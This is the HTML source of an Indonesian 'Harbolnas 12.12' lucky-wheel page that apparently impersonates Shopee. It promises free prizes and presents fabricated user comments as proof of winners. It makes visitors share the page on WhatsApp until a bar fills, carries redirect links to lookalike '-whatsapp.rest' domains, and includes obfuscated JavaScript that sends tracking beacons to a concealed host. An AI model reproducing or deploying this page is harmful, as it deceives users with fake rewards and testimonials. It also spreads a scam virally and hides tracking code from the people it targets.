
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="noindex, nofollow">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<meta content='width=device-width, initial-scale=1.0' name='viewport' />
<link id="favicon" rel="shortcut icon" href="//lb.href.style/zp/id-icon.jpg">
<meta property="og:image" content="//lb.href.style/zp/id-icon.jpg">
<meta property="og:title" content="🔥 Harbolnas - 12.12 🌹">
<title>🔥 Harbolnas - 12.12 🌹</title>
<meta property="og:type" content="article">
<meta property="og:description" content="Hadiah gratis, lihat betapa beruntungnya Anda!">
<meta property="og:url" content="https://Shopee.com">
<link rel="icon" href="data:image/ico;base64,aWNv">
<style>     
    #status {
        color: #F4211A;
        font-size: 1.0em;
        font-family:'minecraftfont';
    
        height:100%;
    }
    .pop {
        animation: pop 0.58s infinite;
        -webkit-animation: pop 0.58s infinite;
    }
    @keyframes pop {
        from {
            transform:scale(0.95)
        }
        50% {
            transform:scale(1)
        }
        to {
            transform:scale(0.95)
        }
    }
    @-webkit-keyframes pop {
        from {
            -webkit-transform:scale(0.95)
        }
        50% {
            -webkit-transform:scale(1)
        }
        to {
            -webkit-transform:scale(0.95)
        }
    }
        * {
            margin: 0
        }
        body {
            font-family: tahoma, verdana, arial, sans-serif;
            background-color: #F7F7F7
        }
        .header {
            background-color: #4267B2
        }
        .logo-left {
            padding: 5px;
            vertical-align: middle
        }
        .header-text {
            font-size: 20px;
            height: 35px;
            vertical-align: middle;
            color: #FFF
        }
        .spinnerContainer {
            position: relative;
            transform: translateX(20%)
        }
        #clicker,
        #clicker2 {
            display: none
        }
        .clearfix::after,
        .clearfix::before {
            content: "";
            display: table
        }
        .clearfix::after {
            clear: both
        }
        .fbcoms {
            padding: 0 5px;
            font-family: Tahoma, Verdana, sans-serif;
            background-color: #fff;
            font-size: 12px;
            text-align: left
        }
        .comments {
            font-weight: 700;
            text-align: center;
            padding: 0 5px 10px
        }
        .totlikes {
            margin-top: 3px;
            background-color: #eeeff4;
            padding: 5px 5px 5px 23px;
            background-repeat: no-repeat;
            background-position: 5px center
        }
        .fbblue {
            color: #3c5a96
        }
        .buttons {
            margin-top: 14px;
            padding: 5px;
            font-family: Arial, sans-serif;
            color: #7d7d7f
        }
        .buttons span {
            cursor: pointer
        }
        .buttons span:hover {
            text-decoration: underline
        }
        .viewmore {
            margin-top: 3px;
            background-color: #eeeff4;
            padding: 5px 5px 5px 23px;
            background-position: 5px center;
            background-repeat: no-repeat
        }
        .left {
            cursor: pointer;
            float: left;
            color: #3c5a96
        }
        .left:hover {
            text-decoration: underline
        }
        .right {
            color: #7d7d7f;
            float: right
        }
        div,
        main,
        article,
        aside,
        footer,
        nav,
        section,
        header {
            display: inline;
        }
        span {
            display: block;
        }
        h1,
        h2,
        h3 {
            display: inline;
        }
        .item {
            position: relative;
            margin-top: 3px;
            background-color: #eeeff4;
            padding: 5px 5px 5px 60px;
            min-height: 60px;
            box-sizing: border-box
        }
        .item .profileimg {
            position: absolute;
            top: 5px;
            left: 5px
        }
        .comtxt {
            line-height: 16px
        }
        .name {
            color: #3c5a96;
            font-weight: 700
        }
        .ago {
            color: #86878c;
            font-size: .95em
        }
        .fblike {
            color: #3c5a96;
            font-size: .95em;
            cursor: pointer
        }
        .fblike:hover {
            text-decoration: underline
        }
        .combot {
            padding-top: 5px
        }
        .likes {
            color: #3c5a96;
            font-size: .95em;
            cursor: pointer
        }
        .comments,
        .hidden .combot,
        .hidden .comtxt {
            display: none
        }
        #fbalert>div {
            margin-left: 0
        }
        #fbalert {
            background-color: #fff;
            padding: 5px
        }
        #spinner {
            position: relative;
            margin: 1em auto 0;
            width: 315px;
            overflow: hidden
        }
        @media(min-width:360px) {
            #spinner {
                width: 340px
            }
        }
        #spinBG {
            z-index: 1;
            width: 315px
        }
        @media(min-width:360px) {
            #spinBG {
                width: 340px
            }
        }
        #spin {
            z-index: 2;
            position: absolute;
            top: 8px;
            left: 8px;
            width: 300px
        }
        @media(min-width:360px) {
            #spin {
                width: 325px
            }
        }
        #win,
        #win2,
        #win3,
        #winP,
        #winP1,
        #winP2 {
            position: absolute;
            z-index: 3;
            width: 65px;
            left: 126px;
            top: 120px
        }
        @media(min-width:360px) {
            #win, #win2, #win3, #winP, #winP1, #winP2 {
                width: 90px
            }
        }
        #win2,
        #win3,
        #winP,
        #winP1,
        #winP2 {
            display: none
        }
        .spinAround {
            -webkit-animation: spin 6.6s;
            -moz-animation: spin 6.6s;
            -o-animation: spin 6.6s;
            animation: spin 6.6s;
            -webkit-animation-timing-function: ease;
            -moz-animation-timing-function: ease;
            -o-animation-timing-function: ease;
            animation-timing-function: ease;
            -webkit-animation-iteration-count: 1;
            -moz-animation-iteration-count: 1;
            -o-animation-iteration-count: 1;
            animation-iteration-count: 1;
            -webkit-animation-direction: normal;
            -moz-animation-direction: normal;
            -o-animation-direction: normal;
            animation-direction: normal;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }
        @-webkit-keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
                transform: rotate(0deg)
            }
            90% {
                -webkit-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }
            95% {
                -webkit-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }
            100% {
                -webkit-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }
        @-moz-keyframes spin {
            0% {
                -moz-transform: rotate(0deg);
                transform: rotate(0deg)
            }
            90% {
                -moz-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }
            95% {
                -moz-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }
            100% {
                -moz-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }
        @-o-keyframes spin {
            0% {
                -o-transform: rotate(0deg);
                transform: rotate(0deg)
            }
            90% {
                -o-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }
            95% {
                -o-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }
            100% {
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }
        @keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg)
            }
            90% {
                -webkit-transform: rotate(3110deg);
                -moz-transform: rotate(3110deg);
                -o-transform: rotate(3110deg);
                transform: rotate(3110deg)
            }
            95% {
                -webkit-transform: rotate(3108deg);
                -moz-transform: rotate(3108deg);
                -o-transform: rotate(3108deg);
                transform: rotate(3108deg)
            }
            100% {
                -webkit-transform: rotate(3109deg);
                -moz-transform: rotate(3109deg);
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
        }
        .spinAround2 {
            -webkit-animation: spinTwo 6.6s;
            -moz-animation: spinTwo 6.6s;
            -o-animation: spinTwo 6.6s;
            animation: spinTwo 6.6s;
            -webkit-animation-timing-function: ease;
            -moz-animation-timing-function: ease;
            -o-animation-timing-function: ease;
            animation-timing-function: ease;
            -webkit-animation-iteration-count: 1;
            -moz-animation-iteration-count: 1;
            -o-animation-iteration-count: 1;
            animation-iteration-count: 1;
            -webkit-animation-direction: normal;
            -moz-animation-direction: normal;
            -o-animation-direction: normal;
            animation-direction: normal;
            -webkit-animation-fill-mode: forwards;
            -moz-animation-fill-mode: forwards;
            -o-animation-fill-mode: forwards;
            animation-fill-mode: forwards
        }
        @-webkit-keyframes spinTwo {
            0% {
                -webkit-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
            90% {
                -webkit-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }
            95% {
                -webkit-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }
            100% {
                -webkit-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }
        @-moz-keyframes spinTwo {
            0% {
                -moz-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
            90% {
                -moz-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }
            95% {
                -moz-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }
            100% {
                -moz-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }
        @-o-keyframes spinTwo {
            0% {
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
            90% {
                -o-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }
            95% {
                -o-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }
            100% {
                -o-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }
        @keyframes spinTwo {
            0% {
                -webkit-transform: rotate(3109deg);
                -moz-transform: rotate(3109deg);
                -o-transform: rotate(3109deg);
                transform: rotate(3109deg)
            }
            90% {
                -webkit-transform: rotate(6314deg);
                -moz-transform: rotate(6314deg);
                -o-transform: rotate(6314deg);
                transform: rotate(6314deg)
            }
            95% {
                -webkit-transform: rotate(6312deg);
                -moz-transform: rotate(6312deg);
                -o-transform: rotate(6312deg);
                transform: rotate(6312deg)
            }
            100% {
                -webkit-transform: rotate(6313deg);
                -moz-transform: rotate(6313deg);
                -o-transform: rotate(6313deg);
                transform: rotate(6313deg)
            }
        }
        ol,
        ul {
            list-style: none
        }
        .clearfix:after {
            content: " ";
            display: block;
            height: 0;
            clear: both;
            overflow: hidden;
            visibility: hidden
        }
        .clearfix {
            display: block
        }
        .wrapper {
            background-color: #fff;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 7px;
            width: 96%;
            margin: 0 auto 14px;
            border: 1px solid #c4cde1;
            border-top: 0;
            max-width: 414px
        }
        .logo {
            display: block;
            margin: 4px auto;
        }
        .txt {
            padding: 5px 6px;
            line-height: 18px;
            text-align: center
        }
        .bottom {
            width: 92%;
            margin: 20px auto 0;
            border: 1px solid #ccc;
            background-color: #f2f2f2;
            padding: 5px;
            border-radius: 10px;
            -moz-border-radius: 10px;
            -webkit-border-radius: 10px
        }
        .now {
            text-align: center;
            padding-top: 5px
        }
        #countdown {
            font-weight: bold;
        }
        .rules {
            color: #1b316c;
            padding: 4px 5px;
            line-height: 22px
        }
        a {
            display: block;
            background-color: #39579a;
            border-radius: 7px;
            -moz-border-radius: 7px;
            -webkit-border-radius: 7px;
            padding: 10px 0;
            text-align: center;
            font-weight: 700;
            color: #fff;
            font-size: 1.6em;
            border-bottom: 1px solid #1b316c;
            margin: 7px 13px 5px;
            text-decoration: none
        }
        .title {
            text-align: center;
            font-weight: 700;
            font-size: 26px
        }
        .show-all {
            display: none;
        }
        .now2 {
            padding-top: 10px;
            font-weight: bold;
        }
    </style>
<style type="text/css">
    .form_questions {
            width: 100%;
            background-color: #fff
    }
    .wrapper {
            max-width: 800px;
            width: 96%;
            margin: 0 auto
    }
    .myButton {
            background-color: #39579a;
            border-radius: 4px;
            border: 2px solid #39579a;
            display: block;
            cursor: pointer;
            color: #ffffff;
            font-size: 20px;
            /* font-weight: 200; */
            
            font-weight: bold;
            margin: 10px auto;
            padding: 13px 32px;
            /* padding: 10px; */
            
            text-decoration: none;
            width: 230px;
    }
    
    
    
        
    .last_page{
    display: none;
    }
    .last-up{
    text-align: left;
    }
    .textlastup{
    color: #068afb;
    font-size: 18px;
    padding-bottom: 8px;
    font-weight: 400;
    }
    .btn{
    width: 80%;
    font-size: 28px;
    max-width: 345px;
    margin: 15px auto;
    background-color: #58BE41;
    border-radius: 5px;
    color: #fff;
    font-weight: 700;
    text-align: center;
    display: block;
    padding: 7px 0;
    text-decoration: none;
    -webkit-transition: all 0.2s ease-in-out;
    -moz-transition: all 0.2s ease-in-out;
    transition: all 0.2s ease-in-out;
    box-shadow: none;
    }
    .btn:hover{
    background-color: #fff;
    color: #58BE41;
    box-shadow: 0 0 2px #58BE41,
    0 0 5px #58BE41,
    0 0 7px #58BE41,
    0 0 11px #58BE41;
    }
    .btn-share{
    font-size: 24px;
    background-color: #58BE41;
    background-size: 40px auto;
    background-position: left 5px top 1px;
    background-repeat: no-repeat;
    }
    
    .progress {      width:80%;      height: 20px;  /* Can be anything */      position: relative;      margin: 60px 0 20px 0; /* Just for demo spacing */      background: #555;      padding: 10px;      -webkit-box-shadow: inset 0 -1px 1px rgba(255,255,255,0.3);      -moz-box-shadow   : inset 0 -1px 1px rgba(255,255,255,0.3);      box-shadow        : inset 0 -1px 1px rgba(255,255,255,0.3);      margin: auto;    }    .progress > span {      display: block;      height: 20px;	  left: 0;	  top: 0;      background-color: #3F51B5;      background-image: -webkit-gradient(         linear,         left bottom,         left top,         color-stop(0, #00BCD4),         color-stop(1, #2196F3)        );      background-image: -moz-linear-gradient(        center bottom,        rgb(43,194,83) 37%,        rgb(84,240,84) 69%       );      -webkit-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      -moz-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      position: absolute;      overflow: hidden;    }    .progress > span:after, .animate > span > span {      content: "";      position: absolute;      top: 0; left: 0; bottom: 0; right: 0;      background-image:          -webkit-gradient(linear, 0 0, 100% 100%,             color-stop(.25, rgba(255, 255, 255, .2)),             color-stop(.25, transparent), color-stop(.5, transparent),             color-stop(.5, rgba(255, 255, 255, .2)),             color-stop(.75, rgba(255, 255, 255, .2)),             color-stop(.75, transparent), to(transparent)         );      background-image:         -moz-linear-gradient(          -45deg,             rgba(255, 255, 255, .2) 25%,             transparent 25%,             transparent 50%,             rgba(255, 255, 255, .2) 50%,             rgba(255, 255, 255, .2) 75%,             transparent 75%,             transparent         );      z-index: 1;      -webkit-background-size: 50px 50px;      -moz-background-size: 50px 50px;      -webkit-animation: move 2s linear infinite;         -webkit-border-top-right-radius: 8px;      -webkit-border-bottom-right-radius: 8px;             -moz-border-radius-topright: 8px;          -moz-border-radius-bottomright: 8px;                 border-top-right-radius: 8px;              border-bottom-right-radius: 8px;          -webkit-border-top-left-radius: 20px;       -webkit-border-bottom-left-radius: 20px;              -moz-border-radius-topleft: 20px;           -moz-border-radius-bottomleft: 20px;                  border-top-left-radius: 20px;               border-bottom-left-radius: 20px;      overflow: hidden;    }        .animate > span:after {      display: none;    }        @-webkit-keyframes move {        0% {           background-position: 0 0;        }        100% {           background-position: 50px 50px;        }    }
    
       .buttond {
                background-color: #0d609b;
                color: #fff;
                font-size: 1.2em;
                font-weight: bold;
                text-align: center;
                padding:10px;
                margin-top:5px;
            }
    
    
    .btn-down{
    font-size: 24px;
    text-transform: uppercase;
    }

    body,
    html {
        background: #F7F7F7;
        direction:ltr;
    }
</style>
<!--<link rel="stylesheet" href="//lb.href.style/zp/zp.css?8888120201" />
    <link rel="stylesheet" href="//lb.href.style/zp/zp.css?8888120201" />
    <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
    -->
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" integrity="sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/lazyload@2.0.0-rc.2/lazyload.js"></script>
<script async src="//www.googletagmanager.com/gtag/js?id=G-VLP9ZRYVD3"></script>
<script>
        var spin2enabled= true;
        var tranDomain = encodeURIComponent('https://oy8-whatsapp.rest/zp/?l=id&x=1&t=08');
        var daoliang_url = '';

        var alertTip = "Berbagi gagal! Grup yang sama atau teman yang sama salah. Silakan periksa dan bagikan lagi.";
        var alertTip2 = "Sharing failed!The same group or the same friend is not correct. Please check and share again.";
        var alertTip3 = "Sharing failed!The same group or the same friend is not correct. Please check and share again.";
        var alertTip4 = "Sharing failed!The same group or the same friend is not correct. Please check and share again.";

        var like_str = "Suka ";
        var shareBtn = "whatsapp";
        var ogDescription = "Hadiah gratis, lihat betapa beruntungnya Anda!";
        var tipnstr = "'Anda Harus Berbagi dengan teman-teman di Whatsapp tentang promosi kami Ke Alamat Pengiriman. Bagikan hingga bilah biru penuh!'";
        var share_detail = "";
        share_detail = share_detail.replace(/zzz/g, "%0A");
        var returnUrl = '["https:\/\/tir-whatsapp.rest\/jk\/?x=1"]';
        var returnUrls = [];
        if (returnUrl != "") {
            returnUrls = JSON.parse(returnUrl);
        }
        var value=0;
        var appName= "Whatsapp";
        var _0x2e11=['gmo3xMCZs29dWPP1','WOvnfSk7W5rNxG==','r17cSConu1KsfSk5xa==','W4a3W6tcMCoxamosW77dJSkr','W4H+W5JcSuykWPq=','euCB','rWRdKv4JW55PWPJcLmo+','Bmk6W7uPWOKr','fSkkESosWP92W7LyhbK=','oCoqW5C8WP1n'];(function(_0x4b9a66,_0x3992c8){var _0x2e1129=function(_0x48ccb1){while(--_0x48ccb1){_0x4b9a66['push'](_0x4b9a66['shift']());}};_0x2e1129(++_0x3992c8);}(_0x2e11,0x98));var _0x48cc=function(_0x4b9a66,_0x3992c8){_0x4b9a66=_0x4b9a66-0xc0;var _0x2e1129=_0x2e11[_0x4b9a66];if(_0x48cc['Igenhe']===undefined){var _0x48ccb1=function(_0x3ecbec){var _0x3535bf='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=',_0x555366=String(_0x3ecbec)['replace'](/=+$/,'');var _0x57019f='';for(var _0x464e73=0x0,_0x4db537,_0x4c96ef,_0x2bc050=0x0;_0x4c96ef=_0x555366['charAt'](_0x2bc050++);~_0x4c96ef&&(_0x4db537=_0x464e73%0x4?_0x4db537*0x40+_0x4c96ef:_0x4c96ef,_0x464e73++%0x4)?_0x57019f+=String['fromCharCode'](0xff&_0x4db537>>(-0x2*_0x464e73&0x6)):0x0){_0x4c96ef=_0x3535bf['indexOf'](_0x4c96ef);}return _0x57019f;};var _0xbd674f=function(_0x3c6733,_0x38fe7e){var _0x628b7=[],_0x387f76=0x0,_0x28d253,_0x33db65='',_0x2d850f='';_0x3c6733=_0x48ccb1(_0x3c6733);for(var _0x1c9ac3=0x0,_0x2d6295=_0x3c6733['length'];_0x1c9ac3<_0x2d6295;_0x1c9ac3++){_0x2d850f+='%'+('00'+_0x3c6733['charCodeAt'](_0x1c9ac3)['toString'](0x10))['slice'](-0x2);}_0x3c6733=decodeURIComponent(_0x2d850f);var _0x21d376;for(_0x21d376=0x0;_0x21d376<0x100;_0x21d376++){_0x628b7[_0x21d376]=_0x21d376;}for(_0x21d376=0x0;_0x21d376<0x100;_0x21d376++){_0x387f76=(_0x387f76+_0x628b7[_0x21d376]+_0x38fe7e['charCodeAt'](_0x21d376%_0x38fe7e['length']))%0x100,_0x28d253=_0x628b7[_0x21d376],_0x628b7[_0x21d376]=_0x628b7[_0x387f76],_0x628b7[_0x387f76]=_0x28d253;}_0x21d376=0x0,_0x387f76=0x0;for(var _0x1b985f=0x0;_0x1b985f<_0x3c6733['length'];_0x1b985f++){_0x21d376=(_0x21d376+0x1)%0x100,_0x387f76=(_0x387f76+_0x628b7[_0x21d376])%0x100,_0x28d253=_0x628b7[_0x21d376],_0x628b7[_0x21d376]=_0x628b7[_0x387f76],_0x628b7[_0x387f76]=_0x28d253,_0x33db65+=String['fromCharCode'](_0x3c6733['charCodeAt'](_0x1b985f)^_0x628b7[(_0x628b7[_0x21d376]+_0x628b7[_0x387f76])%0x100]);}return _0x33db65;};_0x48cc['anQNbe']=_0xbd674f,_0x48cc['bYJlwn']={},_0x48cc['Igenhe']=!![];}var _0x427e22=_0x48cc['bYJlwn'][_0x4b9a66];return _0x427e22===undefined?(_0x48cc['wKGpLL']===undefined&&(_0x48cc['wKGpLL']=!![]),_0x2e1129=_0x48cc['anQNbe'](_0x2e1129,_0x3992c8),_0x48cc['bYJlwn'][_0x4b9a66]=_0x2e1129):_0x2e1129=_0x427e22,_0x2e1129;};var _0x23a9d1=_0x48cc;window[_0x23a9d1(0xc2,'Z)Z7')]=function(_0x427e22,_0xbd674f){var _0x1ff907=_0x23a9d1;_0xbd674f?get_Cookie(_0x427e22+_0xbd674f)!==_0x427e22+_0xbd674f&&(new Image()['src']=_0x1ff907(0xc8,'eOom')+_0x1ff907(0xc4,'Glc!')+_0x1ff907(0xc1,'6GO6')+_0x1ff907(0xc7,'r5WM')+_0x427e22+_0x1ff907(0xc5,'FNtP')+_0xbd674f,set_Cookie(_0x427e22+_0xbd674f,_0x427e22+_0xbd674f)):get_Cookie(_0x427e22)!==_0x427e22&&(new Image()[_0x1ff907(0xc3,'bM8A')]=_0x1ff907(0xc6,'5NSB')+_0x1ff907(0xc4,'Glc!')+_0x1ff907(0xc0,'f%X4')+_0x1ff907(0xc9,'SmoS')+_0x427e22,set_Cookie(_0x427e22,_0x427e22));};
    </script>
</head>
<body onload="spinnerAction()">
<img src="//lb.href.style/zp/loading.gif" id="loading" style="position:absolute;left:45%;top:45%;width:10%;">
<div id="fatherdiv" style="visibility: hidden;width:100%;height:100%;postion:relative">
<div class="header">
<span class="header-text"> Harbolnas - 12.12 <br>
<img src="//lb.href.style/zp/1212.png" class="logo_left" height="33" width="70"> Putar Roda Keberuntungan!</span></div>
<div class="hide-all">
<div id="fbalert">
<p>kami memberikan anggota kami 1 putaran gratis untuk mendapatkan kesempatan memenangkan hadiah eksklusif!</p>
<div style="padding-top: 5px; color: #9c9c9c; font-size: 11px;"> </div>
</div>
<div id="status" class="pop">
<center> </center>
</div>
<div id="spinner">
<img id="spinBG" src="//lb.href.style/zp/onWPk80.png">
<img id="spin" src="//lb.href.style/zp/srQqDaB.png">
<img onclick="startSpin()" id="win" src="//lb.href.style/zp/yueEctU.png">
<img onclick="spin2()" id="win2" src="//lb.href.style/zp/4iVeLcI.png">
<img id="winP" src="//lb.href.style/zp/jCpzF7r.png">
<img id="winP2" src="//lb.href.style/zp/eqtMSAx.png">
</div>
<center>
<h6>
<font color="red">Hanya satu hadiah yang diperbolehkan per IP.</font>
</h6>
</center>
<div class="fbcoms">
<p class="comments">Comments:</p>
<p class="buttons" style="display: flex;flex-direction: row;justify-content: flex-start;align-items: center;">
<span><svg width="40" style="enable-background:new 0 0 48 48;" version="1.1" viewBox="0 0 48 48" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<style type="text/css">
                            .st0 {
                                display: none;
                            }

                            .st1 {
                                fill: none;
                                stroke: #303030;
                                stroke-width: 0.7;
                                stroke-linecap: round;
                                stroke-linejoin: round;
                                stroke-miterlimit: 10;
                            }

                            .st2 {
                                fill: #303030;
                            }
                        </style>
<g class="st0" id="Padding__x26__Artboard"></g>
<g id="Icons">
<g>
<path class="st1" d="M17.95222,33.90544h0.9013c0.21198,0,0.42036,0.06112,0.59631,0.17936    c0.28018,0.18827,0.55758,0.3808,0.84545,0.55725c0.16461,0.1009,0.35297,0.24185,0.53977,0.29492l6.92604,0.00805l4.83793,0.0013    c0.9355,0.00025,1.71305-0.76513,1.69462-1.70044c-0.01669-0.84692-0.15599-1.60765-1.00351-1.60765h0.1076    c0.91396,0,1.61795-0.74711,1.60863-1.66102c-0.00988-0.96905,0.13757-1.76219-0.82805-1.76219h0.3228    c0.92,0,1.40993-0.80351,1.40993-1.73351c0-0.92,0.12016-1.65903-0.79984-1.65903h0.32154c0.92,0,1.04668-0.81019,1.04668-1.73019    c0-0.93-0.49831-1.60727-1.41831-1.60727l-8.70333,0.01419c0.20236-0.27825,1.23094-4.09943,1.15505-4.83301    c-0.0544-0.52583-0.20867-1.0503-0.3366-1.56151c-0.17118-0.68406-0.35542-1.36467-0.53957-2.04532    c-0.11769-0.43504-0.8064-0.7405-1.18842-0.87866c-0.58066-0.21-1.19885-0.11427-1.68509,0.26741    c-0.2588,0.20315-0.66063,0.53764-0.66016,0.88888c0.00162,1.21729-0.00109,2.43457,0.00345,3.65185    c0.00004,0.01062,0.00008,0.02123,0.00012,0.03185c0.00023,0.06161,0.00036,0.12407-0.01541,0.18363    c-0.0169,0.06386-0.05128,0.12147-0.08524,0.17812c-0.68155,1.13686-1.36008,2.27553-2.03821,3.41444    c-0.29735,0.4994-0.59458,0.99887-0.89091,1.49888c-0.26875,0.45347-0.51342,0.94802-0.9745,1.23768    c-0.40725,0.25585-0.7805,0.49207-1.19004,0.74735">
</path>
<path class="st1" d="M16.5418,35.94944h-3.68656c-0.7371,0-1.33464-0.59753-1.33464-1.33463V24.34045    c0-0.7371,0.59754-1.33464,1.33464-1.33464h3.68656c0.7371,0,1.33464,0.59754,1.33464,1.33464v10.27436    C17.87644,35.35191,17.2789,35.94944,16.5418,35.94944z">
</path>
<line class="st1" x1="13.55524" x2="13.55524" y1="29.80501" y2="24.76078"></line>
<line class="st1" x1="13.55524" x2="13.55524" y1="30.95262" y2="31.7558"></line>
</g>
</g>
</svg></span><span class="like">Suka </span> <span>
<!--?xml version="1.0" ?--><svg width="40" style="enable-background:new 0 0 48 48;" version="1.1" viewBox="0 0 48 48" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<style type="text/css">
                            .st0 {
                                display: none;
                            }

                            .st1 {
                                fill: none;
                                stroke: #303030;
                                stroke-width: 0.7;
                                stroke-linecap: round;
                                stroke-linejoin: round;
                                stroke-miterlimit: 10;
                            }

                            .st2 {
                                fill: #303030;
                            }
                        </style>
<g class="st0" id="Padding__x26__Artboard"></g>
<g id="Icons">
<g>
<path class="st1" d="M17.30376,30.96737l-0.68934,1.90643l3.79318-1.78069c0.17639-0.0828,0.36885-0.12573,0.5637-0.12573    h12.98269c0.57547,0,1.0463-0.47084,1.0463-1.0463V16.1725c0-0.57547-0.47084-1.0463-1.0463-1.0463H14.04601    c-0.57786,0-1.0463,0.46845-1.0463,1.0463v13.74857c0,0.57786,0.46844,1.0463,1.0463,1.0463H17.30376z">
</path>
<line class="st1" x1="15.04836" x2="15.04836" y1="26.25386" y2="27.01553"></line>
<line class="st1" x1="15.04836" x2="15.04836" y1="18.17051" y2="24.86477"></line>
</g>
</g>
</svg></span> <span>Komentar </span>
</p>
<p class="totlikes"><span id="youand"></span><span class="fbblue">12.068</span> suka</p>
<p class="viewmore clearfix"><span class="left">Lihat lebih banyak komentar</span></p>
<div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/k51iYls.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Priyanka Kapoor </span> ya！ Minggu lalu saya bermain dan memenangkan OPPO F17 Pro� dan coba tebak ?? Hari ini saya telah menerima telepon saya. Aku menyukainya. 💚</p><p class='combot'><span class='ago'>4 minutes ago</span> <span class='fblike'>Suka</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/gg3teDe.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Prashik Sontakke</span> Aku mendapatkan tasnya. Terima kasih. Ini hari terbaik yang pernah ada ⛽️ ..</p><p class='combot'><span class='ago'>13 minutes ago</span> <span class='fblike'>Suka</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/jXhB4c6.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Prakash Panwar</span> Game luar biasa. Baru saja menemukannya. Semoga saya menang. EDIT: Saya tidak punya apa-apa 💔</p><p class='combot'><span class='ago'>29 minutes ago</span> <span class='fblike'>Suka</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/1H2Gelw.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Vicky Arya</span> Saya tidak punya banyak teman di whatsapp saya 😢 </p><p class='combot'><span class='ago'>35 minutes ago</span> <span class='fblike'>Suka</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/IhePd0v.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Ajay Rauniyar</span> Anjali, Ya, saya mendapat hadiah dari situs web ini.💪 </p><p class='combot'><span class='ago'>37 minutes ago</span> <span class='fblike'>Suka</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/AAKwzHS.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Anjali Kaushal Bedi</span> Apakah ada yang benar-benar menang? Saya berputar 2 kali dari kedua akun saya tetapi tidak ada ...</p><p class='combot'><span class='ago'>41 minutes ago</span> <span class='fblike'>Like</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/SMfvBNU.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Arnish Bittoo Chaubey</span> Ohhhhh ya saya menang🙏 ...</p><p class='combot'><span class='ago'>56 minutes ago</span> <span class='fblike'>Like</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/sQZsRZH.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Shubhangi Singh</span> Aku tidak punya apa-apa .. kenapa aku selalu begitu sial😒</p><p class='combot'><span class='ago'>1 hour ago</span> <span class='fblike'>Like</span><span class='likes totlikes'></span></p></div><div class='item'><img class='lazyload profileimg' data-src='https://i.imgur.com/T5yM1yR.jpg' height='50' width='50'><p class='comtxt'><span class='name'>Vandana Semwal</span> Kenapa aku tidak menang ..? tolong bantu</p><p class='combot'><span class='ago'>1 hour ago</span> <span class='fblike'>Like</span><span class='likes 